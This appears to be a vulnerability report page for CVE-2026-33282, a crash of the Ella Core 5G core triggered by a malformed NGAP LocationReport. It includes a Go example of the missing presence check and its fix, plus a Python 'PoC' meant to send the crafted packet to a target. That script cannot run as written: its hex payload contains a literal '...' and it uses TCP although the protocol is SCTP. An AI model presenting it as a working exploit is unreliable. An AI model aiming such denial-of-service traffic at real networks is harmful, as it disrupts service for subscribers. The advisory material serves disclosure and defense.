Security Vulnerability Report
CVE-2026-33282 CVSS 7.5 HIGH

CVE-2026-33282

Published: 2026-03-24 00:16:30
Last Modified: 2026-03-24 19:31:44

Description

Ella Core is a 5G core designed for private networks. Versions prior to 1.6.0 panic when processing a malformed NGAP LocationReport message with `ue-presence-in-area-of-interest` event type and omitting the optional `UEPresenceInAreaOfInterestList` IE. An attacker able to send crafted NGAP messages to Ella Core can crash the process, causing service disruption for all connected subscribers. No authentication is required. Version 1.6.0 added IE presence verification to NGAP message handling.
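
The failure class described above (CWE-476, an optional IE dereferenced without a presence check) and the kind of presence verification the fix describes, as an added Go example. This is not Ella Core's code: the `LocationReport` and `UEPresenceList` types, the handler names and the sample message are hypothetical and constructed for illustration.

```go
package main

import "errors"
import "fmt"

// Hypothetical, simplified decoded LocationReport (not Ella Core's types).
// Optional IEs are pointers: nil means the IE was absent from the message.
type UEPresenceList struct{ Items []string }
type LocationReport struct {
	EventType      string          // e.g. "ue-presence-in-area-of-interest"
	UEPresenceList *UEPresenceList // optional UEPresenceInAreaOfInterestList IE
}

const presenceEvent = "ue-presence-in-area-of-interest"

var ErrMissingIE = errors.New("UEPresenceInAreaOfInterestList IE missing for " + presenceEvent)

// handleUnchecked dereferences the optional IE whenever the event type
// implies it; a report that omits the IE panics here (CWE-476).
func handleUnchecked(r *LocationReport) int {
	if r.EventType == presenceEvent {
		return len(r.UEPresenceList.Items)
	}
	return 0
}

// handleChecked verifies IE presence first and rejects the message with an
// error, so a single malformed PDU cannot take the process down.
func handleChecked(r *LocationReport) (int, error) {
	if r.EventType != presenceEvent {
		return 0, nil
	}
	if r.UEPresenceList == nil {
		return 0, ErrMissingIE
	}
	return len(r.UEPresenceList.Items), nil
}

// panics reports whether f panics.
func panics(f func()) (p bool) {
	defer func() { p = recover() != nil }()
	f()
	return false
}

func main() {
	bad := &LocationReport{EventType: presenceEvent} // constructed sample, IE omitted
	fmt.Println(panics(func() { handleUnchecked(bad) }))
	fmt.Println(handleChecked(bad))
}
```

The same pattern applies to every optional IE whose use is conditional on another field: the decoder accepts the message as valid, so the handler has to enforce the dependency itself.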

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:ellanetworks:ella_core:*:*:*:*:*:*:*:* - VULNERABLE
Ella Core < 1.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket

# PoC for CVE-2026-33282: Ella Core DoS
# This script sends a malformed NGAP LocationReport message
# missing the optional UEPresenceInAreaOfInterestList IE.


def send_exploit(target_ip, target_port):
    # Malformed NGAP payload (Simplified representation)
    # In a real scenario, this requires proper ASN.1 PER encoding
    # with the specific IE omitted.
    # Note: Actual byte construction depends on NGAP specs.
    malformed_payload = bytes.fromhex(
        "001a"  # NGAP PDU type
        "4003"  # Initiating Message
        "..."  # Specific LocationReport structure without the target IE
    )

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((target_ip, target_port))
        print(f"[+] Sending malformed packet to {target_ip}:{target_port}")
        sock.send(malformed_payload)
        print("[+] Packet sent. Check if the service crashed.")
        sock.close()
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    target = "192.168.1.100"  # Replace with actual target IP
    port = 38412  # Default SCTP/NGAP port (might need specific framing)
    send_exploit(target, port)
```

References

https://github.com/ellanetworks/core/security/advisories/GHSA-826q-wrq4-p23x (Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-33282", "sourceIdentifier": "[email protected]", "published": "2026-03-24T00:16:30.370", "lastModified": "2026-03-24T19:31:44.117", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ella Core is a 5G core designed for private networks. Versions prior to 1.6.0 panic when processing a malformed NGAP LocationReport message with `ue-presence-in-area-of-interest` event type and omitting the optional `UEPresenceInAreaOfInterestList` IE. An attacker able to send crafted NGAP messages to Ella Core can crash the process, causing service disruption for all connected subscribers. No authentication is required. Version 1.6.0 added IE presence verification to NGAP message handling."}, {"lang": "es", "value": "Ella Core es un núcleo 5G diseñado para redes privadas. Las versiones anteriores a la 1.6.0 entran en pánico al procesar un mensaje NGAP LocationReport malformado con tipo de evento 'ue-presence-in-area-of-interest' y omitiendo el IE opcional 'UEPresenceInAreaOfInterestList'. Un atacante capaz de enviar mensajes NGAP manipulados a Ella Core puede bloquear el proceso, causando interrupción del servicio para todos los suscriptores conectados. No se requiere autenticación. La versión 1.6.0 añadió verificación de presencia de IE al manejo de mensajes NGAP."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ellanetworks:ella_core:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.0", "matchCriteriaId": "4A60BFD6-666C-4509-BE38-04CBFF557242"}]}]}], "references": [{"url": "https://github.com/ellanetworks/core/security/advisories/GHSA-826q-wrq4-p23x", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```